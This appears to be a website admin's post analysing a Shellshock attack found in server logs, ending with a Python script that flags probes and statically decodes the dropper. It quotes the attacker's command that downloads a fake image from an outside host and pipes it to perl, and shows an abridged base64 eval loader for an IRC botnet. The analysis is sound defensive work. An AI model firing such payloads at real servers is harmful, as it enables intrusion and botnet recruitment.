I'm working on a website and, like many other admins, have found some very interesting data in our logs. Please note that by executing any of the code I mention or link past this point, you'll most likely damage your computer, possibly irreversibly. With that disclaimer out of the way, let's get to the fun stuff. As I was looking through my logs for Shellshock attempts, one in particular caught my eye. The attacker attempted to send me the following payload:

() { :; }; curl http://***.***.***.***/index.png | perl

I decided it would be interesting to look at this "image", seeing as most images are not executable through Perl. After loading the image into a text editor, my suspicion that it was an executable was confirmed. I found the following inside the "image" (abridged so as not to fill the page):
#!/usr/bin/perl
use MIME::Base64;
# The whole script is one base64 blob: decode it, then hand the result to eval to execute it.
eval (decode_base64('I3lvdSBnb3Qgc2hl...DQo='));
This code takes a base64-encoded string, decodes it, and executes the result with eval; that base64 layer is the only obfuscation. Luckily, as demonstrated here, base64 is trivially decodable. I proceeded to decode it and was excited to see that the source code was easily readable. The gist of the code I discovered was adding the infected machine to a DDoS and spam-email botnet controlled over IRC. As you can see by looking at the source (again, don't run it), the botnet is run by the users "M", "st0n3d", "x00" and "Jorgee". Judging by the nice, ASCII-art-filled interface, I'm guessing they plan on selling their botnet. This attack was reasonably well masked, though the server in question was already patched for Shellshock. Nice try though!
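As an added example (not code from the original post), here is a small Python triage script in the spirit of the log review above: it flags Shellshock probes in access-log lines, pulls out the URL a probe tries to fetch, and statically unwraps the dropper's eval(decode_base64(...)) layer without executing anything. The IP addresses, log lines and dropper body are constructed stand-ins, not values from the post.

```python
import base64
import re

# Shellshock trigger: an exported-function definition with trailing commands.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")
# Downloader commands the trailing part typically chains into (curl/wget ... | perl).
FETCH_RE = re.compile(r'\b(?:curl|wget)\b[^|;"]*?(https?://[^\s"\']+)')
# The dropper's single packing layer: eval(decode_base64('...')).
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*decode_base64\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)")

def find_shellshock_attempts(log_lines):
    """Return (client_ip, fetched_url_or_None) for every line carrying a probe."""
    hits = []
    for line in log_lines:
        if not SHELLSHOCK_RE.search(line):
            continue
        client_ip = line.split(" ", 1)[0]   # first field of a combined-format line
        m = FETCH_RE.search(line)
        hits.append((client_ip, m.group(1) if m else None))
    return hits

def unpack_eval_base64(perl_source):
    """Strip the eval(decode_base64(...)) wrapper statically; never runs the payload."""
    m = EVAL_B64_RE.search(perl_source)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")

# Constructed sample log lines (TEST-NET addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :; }; curl http://198.51.100.7/index.png | perl"',
    '203.0.113.9 - - [25/Sep/2014:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [25/Sep/2014:10:13:40 +0000] "GET / HTTP/1.1" 200 2048 "() { :; }; echo probe" "-"',
]

# Constructed stand-in for the dropper; its "payload" is a harmless placeholder script.
SAMPLE_DROPPER = "#!/usr/bin/perl\nuse MIME::Base64;\neval (decode_base64('%s'));\n" % (
    base64.b64encode(b"# constructed placeholder payload\nprint 'hello';\n").decode())

if __name__ == "__main__":
    for ip, url in find_shellshock_attempts(SAMPLE_LOG):
        print("probe from %s, fetches %s" % (ip, url or "nothing"))
    print(unpack_eval_base64(SAMPLE_DROPPER))
```

Only the first stage is unpacked here; a real dropper may nest further layers, so loop until the regex no longer matches before reading the result.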